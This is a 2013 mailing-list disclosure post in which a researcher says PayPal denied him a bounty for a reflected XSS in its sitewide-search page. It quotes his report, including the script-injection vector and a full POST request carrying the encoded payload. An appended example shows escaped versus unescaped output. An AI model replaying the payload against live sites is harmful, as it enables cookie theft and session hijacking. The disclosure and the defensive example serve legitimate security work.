Date: Thu, 30 May 2013 00:38:16 +1000
From: Shubham Shah <shahshubham369@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: PayPal Bug Bounty Controversy - I found the XSS
 first: They still didn't pay me

Heya everyone,
*On the 11th of May, 2013, I reported an XSS that affected the very same 
field that Kugler reported, on the same domain of "paypal.com"* - 
However, I too did not receive a bug bounty.
My name is Shubham Shah, also a security researcher. And coincidentally 
but similarly to Robert Kugler, I too found a cross-site scripting 
vulnerability on PayPal's "sitewide-search" module. My exploit was 
similar to his; it affected the same parameters, except I had used an 
alternate vector - after fiddling with the search system for some time. 
The real controversy, however, is that I am *under 18 years old* and I, 
in the past, have received money from their program under my older 
sibling's PayPal account, with permission. When I reported the XSS pretty much the 
same as Kugler reported, I was "not eligible for a bounty" because 
"Another researcher already discovered the bug". Please take a look at 
the attached emails and screenshots.

Here is what I sent to the Site Security team via their PGP portal:
====================================================

To Paypal Site Security Team,
Recently I have discovered an XSS vulnerability which affects the wide majority of Paypal.com/*. This XSS vulnerability is a POST type, on the affected script "searchscr?cmd=_sitewide-search".
Affected domains:
https://www.paypal.com/*/cgi-bin/searchscr?cmd=_sitewide-search
(The * indicates any country code)
for example:
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
etc.

The XSS vector successfully executes on Internet Explorer and Firefox (newest builds). It does not execute on Chrome, but it is possible to create a custom vector to do so. If needed, I can create such a vector.

XSS Vector: '"<script >alert(document.cookie)</script>
The bypass used is the ['"] in front of any HTML or script injection (without the square brackets).

This exploit has the capability of stealing a large number of user cookies in a short period of time with cookie stealers. If needed I can also provide a PoC for this. This can be done stealthily and would cause major mayhem if exploited!

Here are some proof-of-concept images:
http://pasteboard.co/2lU54Wuj.png  (PNG file hosted on pasteboard.co) - document.cookie xss on firefox

Here are my personal HTTP headers for making this exploit execute:

POST https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search  1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 369

locale_val=en_AU&qrystr_val=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&countstr_val=AU&serverame_val=www.paypal.com&searchResultUrlsCount_val=&queryString_acInput=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&queryString=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&buttonSearch=Search&beta_user=false&form_charset=UTF-8

Thank you for your time in reading this, Shubham Shah

====================================================

Screenshots to prove date of submission and actual message:
http://pbrd.co/18ugpSY <= Date submitted proof
http://pbrd.co/18ugFRZ <= Proof of message

On 05/13/2013 7:47 AM I got told by paypal that:
====================================================

Hi Shubham,

We regret to inform you that your bug submission was not eligible for a bounty for the following reason.  Another researcher already discovered the bug.

Thank you for your participation. We take pride in keeping PayPal the safer place for online payment.

Thank you,
PayPal Security Team

====================================================
Once again, here are some screenshots:
http://pbrd.co/18uhtGD <= Proof of date I submitted it
http://pbrd.co/18uhMkI <= Proof of message - As I could not take a print 
screen of the far right side, I included the barebones - print version 
of the message - so others can verify the date I received the response.

Thanks for reading through,
I actually didn't get anything from PayPal similar to Robert, but I was 
able to report the vulnerability 8 days earlier than Robert - and still 
did not receive any acknowledgement.
Frankly, I was okay with it and moved on. I do not actually have much 
against the bounty as I have been paid numerous times. PayPal has 
honoured many of my vulnerabilities. However, I can tell you that 
recently none of my security submissions have been honoured - they state 
that all my newer submissions have been already reported - I have no 
actual way of verifying if they have or not, so I just move on and 
continue pentesting with spirit.

Also, Robert, I am amazed by your work done with security regarding 
Mozilla! They were awesome finds! Solid stuff man, I hope one day that I 
can move onto learning more about application security.
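
Added example (not part of the original post, and not PayPal's code): a constructed search-page renderer showing why the leading '" in the reported vector matters when a query is echoed unescaped, next to the output-encoded form that neutralises it. It assumes the query is reflected into a quoted attribute and into body text; the function names and the sample body are hypothetical, and only the field names and the vector come from the report.

```javascript
// Added example: a constructed search-page renderer, not PayPal's code.
// Assumption: the query is echoed into a quoted attribute and into body text.

// Vector exactly as quoted in the report above.
const VECTOR = `'"<script >alert(document.cookie)</script>`;

// Unsafe: raw interpolation. The leading quote closes value="...", so the
// markup that follows is parsed as HTML instead of staying attribute data.
function renderUnsafe(query) {
  return `<input name="queryString" value="${query}">` +
         `<p>Results for ${query}</p>`;
}

// Escape the five characters that can change the HTML parsing context.
// Sufficient for text nodes and for single- or double-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: the same template, with the query encoded at the point of output.
function renderSafe(query) {
  const q = escapeHtml(query);
  return `<input name="queryString" value="${q}">` +
         `<p>Results for ${q}</p>`;
}

// Review helper: decode a form-urlencoded body and list the fields whose
// decoded value contains characters that must be escaped before reflection.
function fieldsNeedingEscape(body) {
  const flagged = [];
  for (const [name, value] of new URLSearchParams(body)) {
    if (/[<>"']/.test(value)) flagged.push(name);
  }
  return flagged;
}

// Constructed sample body, shortened, using field names from the report.
const SAMPLE_BODY =
  'locale_val=en_AU' +
  '&qrystr_val=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E' +
  '&queryString=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E' +
  '&buttonSearch=Search';
```

Marking session cookies HttpOnly keeps them out of document.cookie, but it does not remove the injection itself; the encoding at output is the fix.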
